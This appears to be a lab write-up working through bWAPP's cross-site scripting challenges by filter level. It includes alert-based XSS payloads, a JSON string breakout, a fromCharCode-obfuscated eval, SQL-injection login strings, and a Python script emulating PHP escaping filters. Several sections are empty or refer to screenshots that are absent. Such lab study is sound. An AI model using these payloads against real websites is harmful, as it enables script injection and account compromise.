bWAPP A3 - Cross-Site Scripting (XSS)

1. XSS - Reflected (GET)

xss_get.php

1. low

http://129.211.9.195:10200/xss_get.php?firstname=&lastname=222&form=submit

2. medium

addslashes
Adds a backslash before certain characters: the single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
http://129.211.9.195:10200/xss_get.php?firstname=&lastname=222&form=submit

3. high

htmlspecialchars
// '&' (ampersand) becomes '&amp;'
// '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
// "'" (single quote) becomes '&#039;' (or '&apos;') only when ENT_QUOTES is set
// '<' (less than) becomes '&lt;'
// '>' (greater than) becomes '&gt;'


Welcome <script>alert(636)</script> 222

2. XSS - Reflected (POST)

xss_post.php

Same as 1. XSS - Reflected (GET)

3. XSS - Reflected (JSON)

xss_json.php

1. low

1"}]}';alert(636)//
1"}]}';

2. medium

htmlspecialchars

3. high

htmlspecialchars
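As an added example (not from the original write-up and not bWAPP's own source), the following Python script emulates the addslashes and htmlspecialchars filters used at the medium and high levels of both the Reflected (GET) and Reflected (JSON) challenges and runs the page's two payloads through them. The single-quote rows assume the JSON value sat in a single-quoted JS literal, which is an assumption to show the ENT_QUOTES caveat, not how bWAPP is written.

```python
"""Emulate the PHP filters bWAPP applies per level and check which of the
write-up's payloads still reach the browser in a usable form."""
import re

# Payloads taken from the write-up above
SCRIPT = "<script>alert(636)</script>"   # xss_get.php, HTML body context
JSON_BREAK = '1"}]}\';alert(636)//'      # xss_json.php, JS string in <script>


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash before ' \" \\ and NUL; < > & untouched."""
    s = s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return s.replace("\x00", "\\0")


def htmlspecialchars(s: str, ent_quotes: bool = False) -> str:
    """PHP htmlspecialchars(): & < > and double quote always, ' only with ENT_QUOTES."""
    s = (s.replace("&", "&amp;").replace("<", "&lt;")
          .replace(">", "&gt;").replace('"', "&quot;"))
    return s.replace("'", "&#039;") if ent_quotes else s


def has_raw_tag(html: str) -> bool:
    """Can the filtered value still open an element in an HTML body context?"""
    return re.search(r"<[A-Za-z/]", html) is not None


def breaks_js_string(js: str, delim: str = '"') -> bool:
    """Does an unescaped delimiter survive, letting the value leave the JS
    string literal that a JSON-in-<script> page wraps it in?"""
    return re.search(r"(?<!\\)" + re.escape(delim), js) is not None


def html_context_results() -> dict:
    """XSS - Reflected (GET): is the <script> payload still usable per filter?"""
    return {
        "low (no filter)": has_raw_tag(SCRIPT),                            # True
        "medium (addslashes)": has_raw_tag(addslashes(SCRIPT)),            # True: nothing to escape
        "high (htmlspecialchars)": has_raw_tag(htmlspecialchars(SCRIPT)),  # False: < becomes &lt;
    }


def json_context_results() -> dict:
    """XSS - Reflected (JSON): can the value break out of the JSON string?
    The two "' delimiter" rows assume a single-quoted literal (constructed case)."""
    return {
        "low (no filter)": breaks_js_string(JSON_BREAK),                                  # True
        "htmlspecialchars": breaks_js_string(htmlspecialchars(JSON_BREAK)),               # False
        "htmlspecialchars, ' delimiter": breaks_js_string(htmlspecialchars(JSON_BREAK), "'"),  # True
        "ENT_QUOTES, ' delimiter": breaks_js_string(htmlspecialchars(JSON_BREAK, True), "'"),   # False
    }
```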

4. XSS - Reflected (AJAX/JSON)

xss_ajax_2-1.php


(screenshot: 01.png)

1. low

2. medium

3. high

We can use the JSON.parse() method to convert the data into a JavaScript object.

5. XSS - Reflected (AJAX/XML)

xss_ajax_1-1.php
HTML character entities
Understand the role of HTML escaping

1. low

<img src=0 onerror="alert(1)">

2. medium

<img src=0 onerror="alert(1)">

3. high

htmlspecialchars

6. XSS - Reflected (Back Button)

xss_back_button.php

1. low

Open the page and refresh it once
Click the Go back button
Change the Referer to '">
(screenshot: 02.png)

2. medium

Filtered with addslashes; cannot be bypassed

3. high

Filtered with htmlspecialchars; cannot be bypassed

7. XSS - Reflected (Custom Header)

xss_custom_header.php

1. low

bWAPP:

(screenshot: 03.png)

2. medium

Filtered with addslashes; cannot be bypassed

3. high

Filtered with htmlspecialchars; cannot be bypassed

8. XSS - Reflected (Eval)

xss_eval.php

1. low

alert(636)

2. medium

alert(636)

(screenshot: 04.png)

eval(String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41)) // the character codes decode to alert(/xss/)

3. high

Filtered with htmlspecialchars; cannot be bypassed

(screenshot: 05.png)

9. XSS - Reflected (HREF)

xss_href-1.php

1. low

1

(screenshot: 06.png)

2. medium

urlencode(string $str): string
Encodes the string for use in the query part of a URL; it is also a convenient way to pass variables to the next page.

3. high

urlencode(string $str): string
Encodes the string for use in the query part of a URL; it is also a convenient way to pass variables to the next page.

10. XSS - Reflected (Login Form)

xss_login.php

1. low

login=' or 1=1,""&password=1&form=submit
login=' or 1=1' &password=1&form=submit

2. medium

addslashes

3. high

The mysql_real_escape_string() function
Escapes special characters in a string for use in an SQL statement. The following characters are affected:
\x00, \n, \r, \, ', ", \x1a

11. phpMyAdmin BBCode Tag XSS

xss_phpmyadmin.php

1. low

2. medium

3. high

12. XSS - Reflected (PHP_SELF)

xss_php_self.php

1. low

firstname=&lastname=2333&form=submit

2. medium

firstname=&lastname=2333&form=submit

3. high

htmlspecialchars

13. XSS - Reflected (Referer)

xss_referer.php

1. low

Referer:

(screenshots: 07.png, 08.png)

2. medium

3. high

14. XSS - Reflected (User-Agent)

xss_user_agent.php

1. low

(screenshot: 09.png)

2. medium

(screenshot: 10.png)

3. high

htmlspecialchars

15. XSS - Stored (Blog)

xss_stored_1.php
Output encoding

1. low

2. medium

addslashes

3. high

htmlspecialchars

16. XSS - Stored (Change Secret)

xss_stored_3.php

1. low

2. medium

3. high

17. XSS - Stored (Cookies)

1. low

http://129.211.9.195:10200/xss_stored_2.php?genre=123&form=like
Changing genre directly changes the cookie

2. medium

The input parameter is filtered with addslashes

3. high

Modification is not allowed

18. SQLiteManager XSS

1. low

2. medium

3. high

19. XSS - Stored (User-Agent)

xss_stored_4.php
Input filtering

1. low

(screenshot: 11.png)

2. medium

(screenshot: 11.png)

3. high

Filtered with htmlspecialchars
